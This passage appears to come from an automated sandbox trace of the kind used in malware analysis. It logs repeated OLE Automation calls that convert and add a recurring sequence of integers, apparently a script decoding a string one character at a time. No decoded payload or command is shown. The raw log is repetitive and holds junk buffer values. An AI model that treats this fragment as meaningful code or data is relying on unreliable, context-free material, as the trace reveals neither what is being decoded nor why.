pvarResult=0x80f6600) returned 0x0 [0047.561] VarBstrFromI2 (iVal=87, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.561] VarI2FromStr (in: strIn="87", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.561] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.562] VarBstrFromI2 (iVal=60, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.562] VarI2FromStr (in: strIn="60", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.562] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.563] VarBstrFromI2 (iVal=62, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.563] VarI2FromStr (in: strIn="62", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.563] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.563] VarBstrFromI2 (iVal=90, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.564] VarI2FromStr (in: strIn="90", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.564] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.564] VarBstrFromI2 (iVal=104, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="ɸ") returned 0x0 [0047.564] VarI2FromStr (in: strIn="104", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.564] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.565] VarBstrFromI2 (iVal=80, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.565] VarI2FromStr (in: strIn="80", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.565] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.566] VarBstrFromI2 (iVal=78, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.566] VarI2FromStr (in: strIn="78", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.566] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.566] VarBstrFromI2 (iVal=64, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.567] VarI2FromStr (in: strIn="64", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.567] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.567] VarBstrFromI2 (iVal=118, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.567] VarI2FromStr (in: strIn="118", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.567] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.568] VarBstrFromI2 (iVal=69, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.568] VarI2FromStr (in: strIn="69", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.568] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.569] VarBstrFromI2 (iVal=119, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.569] VarI2FromStr (in: strIn="119", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.569] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.569] VarBstrFromI2 (iVal=69, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="Ȁ䁁") returned 0x0 [0047.570] VarI2FromStr (in: strIn="69", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.570] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.570] VarBstrFromI2 (iVal=48, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.570] VarI2FromStr (in: strIn="48", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.570] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.571] VarBstrFromI2 (iVal=64, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="\xc570\xee71\x7fe") returned 0x0 [0047.571] VarI2FromStr (in: strIn="64", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.571] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.572] VarBstrFromI2 (iVal=103, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.572] VarI2FromStr (in: strIn="103", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.572] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.572] VarBstrFromI2 (iVal=45, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.572] VarI2FromStr (in: strIn="45", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.572] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.573] VarBstrFromI2 (iVal=87, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.573] VarI2FromStr (in: strIn="87", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.573] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.574] VarBstrFromI2 (iVal=60, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.574] VarI2FromStr (in: strIn="60", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.574] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.575] VarBstrFromI2 (iVal=62, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.575] VarI2FromStr (in: strIn="62", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.575] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.576] VarBstrFromI2 (iVal=90, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.576] VarI2FromStr (in: strIn="90", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.576] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.576] VarBstrFromI2 (iVal=104, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="ɸ") returned 0x0 [0047.576] VarI2FromStr (in: strIn="104", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.576] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.577] VarBstrFromI2 (iVal=80, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.577] VarI2FromStr (in: strIn="80", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.577] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.578] VarBstrFromI2 (iVal=78, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.578] VarI2FromStr (in: strIn="78", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.578] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.578] VarBstrFromI2 (iVal=64, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.579] VarI2FromStr (in: strIn="64", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.579] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.579] VarBstrFromI2 (iVal=118, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.579] VarI2FromStr (in: strIn="118", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.579] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.580] VarBstrFromI2 (iVal=69, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.580] VarI2FromStr (in: strIn="69", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.580] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.581] VarBstrFromI2 (iVal=119, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.581] VarI2FromStr (in: strIn="119", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.581] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.581] VarBstrFromI2 (iVal=69, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="Ȁ䁁") returned 0x0 [0047.581] VarI2FromStr (in: strIn="69", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.581] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.582] VarBstrFromI2 (iVal=48, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.582] VarI2FromStr (in: strIn="48", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.582] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.583] VarBstrFromI2 (iVal=64, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="\xc570\xee71\x7fe") returned 0x0 [0047.583] VarI2FromStr (in: strIn="64", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.583] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.583] VarBstrFromI2 (iVal=103, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.584] VarI2FromStr (in: strIn="103", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.584] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.584] VarBstrFromI2 (iVal=45, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.584] VarI2FromStr (in: strIn="45", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.584] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.585] VarBstrFromI2 (iVal=87, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.585] VarI2FromStr (in: strIn="87", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.585] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.586] VarBstrFromI2 (iVal=60, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.586] VarI2FromStr (in: strIn="60", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.586] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.586] VarBstrFromI2 (iVal=62, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.587] VarI2FromStr (in: strIn="62", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.587] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.587] VarBstrFromI2 (iVal=90, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.587] VarI2FromStr (in: strIn="90", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.587] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.588] VarBstrFromI2 (iVal=104, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="ɸ") returned 0x0 [0047.588] VarI2FromStr (in: strIn="104", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.588] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.589] VarBstrFromI2 (iVal=80, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.589] VarI2FromStr (in: strIn="80", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.589] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.589] VarBstrFromI2 (iVal=78, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.590] VarI2FromStr (in: strIn="78", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.590] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.591] VarBstrFromI2 (iVal=64, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.591] VarI2FromStr (in: strIn="64", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.591] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.591] VarBstrFromI2 (iVal=118, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.591] VarI2FromStr (in: strIn="118", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.591] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.592] VarBstrFromI2 (iVal=69, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.592] VarI2FromStr (in: strIn="69", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.592] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.593] VarBstrFromI2 (iVal=119, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.593] VarI2FromStr (in: strIn="119", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.593] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.593] VarBstrFromI2 (iVal=69, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="Ȁ䁁") returned 0x0 [0047.593] VarI2FromStr (in: strIn="69", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.593] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.594] VarBstrFromI2 (iVal=48, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.594] VarI2FromStr (in: strIn="48", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.594] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.595] VarBstrFromI2 (iVal=64, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="\xc570\xee71\x7fe") returned 0x0 [0047.595] VarI2FromStr (in: strIn="64", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.595] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.596] VarBstrFromI2 (iVal=103, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.596] VarI2FromStr (in: strIn="103", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.596] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.596] VarBstrFromI2 (iVal=45, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.596] VarI2FromStr (in: strIn="45", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.597] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.597] VarBstrFromI2 (iVal=87, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.597] VarI2FromStr (in: strIn="87", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.597] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.598] VarBstrFromI2 (iVal=60, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.598] VarI2FromStr (in: strIn="60", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.598] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.599] VarBstrFromI2 (iVal=62, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.599] VarI2FromStr (in: strIn="62", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.599] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.599] VarBstrFromI2 (iVal=90, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.599] VarI2FromStr (in: strIn="90", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.599] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.601] VarBstrFromI2 (iVal=104, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="\x01ࢍ") returned 0x0 [0047.601] VarI2FromStr (in: strIn="104", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.601] VarAdd (in: pvarLeft=0x80f6610, pvarRight=0x80f6628, pvarResult=0x80f65f8 | out: pvarResult=0x80f65f8) returned 0x0 [0047.602] VarBstrFromI2 (iVal=80, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.602] VarI2FromStr (in: strIn="80", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.602] VarAdd (in: pvarLeft=0x80f6610, pvarRight=0x80f6628, pvarResult=0x80f65f8 | out: pvarResult=0x80f65f8) returned 0x0 [0047.602] VarBstrFromI2 (iVal=78, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.602] VarI2FromStr (in: strIn="78", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.603] VarAdd (in: pvarLeft=0x80f6610, pvarRight=0x80f6628, pvarResult=0x80f65f8 | out: pvarResult=0x80f65f8) returned 0x0 [0047.603] VarBstrFromI2 (iVal=64, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.603] VarI2FromStr (in: strIn="64", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.603] VarAdd (in: pvarLeft=0x80f6610, pvarRight=0x80f6628, pvarResult=0x80f65f8 | out: pvarResult=0x80f65f8) returned 0x0 [0047.604] VarBstrFromI2 (iVal=118, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.604] VarI2FromStr (in: strIn="118", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.604] VarAdd (in: pvarLeft=0x80f6610, pvarRight=0x80f6628, pvarResult=0x80f65f8 | out: pvarResult=0x80f65f8) returned 0x0 [0047.605] VarBstrFromI2 (iVal=69, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.605] VarI2FromStr (in: strIn="69", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.605] VarAdd (in: pvarLeft=0x80f6610, pvarRight=0x80f6628, pvarResult=0x80f65f8 | out: pvarResult=0x80f65f8) returned 0x0 [0047.607] VarBstrFromI2 (iVal=119, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.607] VarI2FromStr (in: strIn="119", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.607] VarAdd (in: pvarLeft=0x80f6610, pvarRight=0x80f6628, pvarResult=0x80f65f8 | out: pvarResult=0x80f65f8) returned 0x0 [0047.608] VarBstrFromI2 (iVal=69, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="Ȁ䁁") returned 0x0 [0047.608] VarI2FromStr (in: strIn="69", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.608] VarAdd (in: pvarLeft=0x80f6610, pvarRight=0x80f6628, pvarResult=0x80f65f8 | out: pvarResult=0x80f65f8) returned 0x0 [0047.608] VarBstrFromI2 (iVal=48, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.608] VarI2FromStr (in: strIn="48", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.608] VarAdd (in: pvarLeft=0x80f6610, pvarRight=0x80f6628, pvarResult=0x80f65f8 | out: pvarResult=0x80f65f8) returned 0x0 [0047.609] VarBstrFromI2 (iVal=64, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="\xc570\xee71\x7fe") returned 0x0 [0047.609] VarI2FromStr (in: strIn="64", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.609] VarAdd (in: pvarLeft=0x80f6610, pvarRight=0x80f6628, pvarResult=0x80f65f8 | out: pvarResult=0x80f65f8) returned 0x0 [0047.610] VarBstrFromI2 (iVal=103, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.610] VarI2FromStr (in: strIn="103", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.610] VarAdd (in: pvarLeft=0x80f6610, pvarRight=0x80f6628, pvarResult=0x80f65f8 | out: pvarResult=0x80f65f8) returned 0x0 [0047.611] VarBstrFromI2 (iVal=45, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.611] VarI2FromStr (in: strIn="45", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.611] VarAdd (in: pvarLeft=0x80f6610, pvarRight=0x80f6628, pvarResult=0x80f65f8 | out: pvarResult=0x80f65f8) returned 0x0 [0047.611] VarBstrFromI2 (iVal=87, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.611] VarI2FromStr (in: strIn="87", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.611] VarAdd (in: pvarLeft=0x80f6610, pvarRight=0x80f6628, pvarResult=0x80f65f8 | out: pvarResult=0x80f65f8) returned 0x0 [0047.612] VarBstrFromI2 (iVal=60, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.612] VarI2FromStr (in: strIn="60", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.612] VarAdd (in: pvarLeft=0x80f6610, pvarRight=0x80f6628, pvarResult=0x80f65f8 | out: pvarResult=0x80f65f8) returned 0x0 [0047.613] VarBstrFromI2 (iVal=62, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.613] VarI2FromStr (in: strIn="62", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.613] VarAdd (in: pvarLeft=0x80f6610, pvarRight=0x80f6628, pvarResult=0x80f65f8 | out: pvarResult=0x80f65f8) returned 0x0 [0047.614] VarBstrFromI2 (iVal=90, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.614] VarI2FromStr (in: strIn="90", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.614] VarAdd (in: pvarLeft=0x80f6610, pvarRight=0x80f6628, pvarResult=0x80f65f8 | out: pvarResult=0x80f65f8) returned 0x0 [0047.614] VarBstrFromI2 (iVal=104, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="ɸ") returned 0x0 [0047.614] VarI2FromStr (in: strIn="104", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.614] VarAdd (in: pvarLeft=0x80f6610, pvarRight=0x80f6628, pvarResult=0x80f65f8 | out: pvarResult=0x80f65f8) returned 0x0 [0047.615] VarBstrFromI2 (iVal=80, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.615] 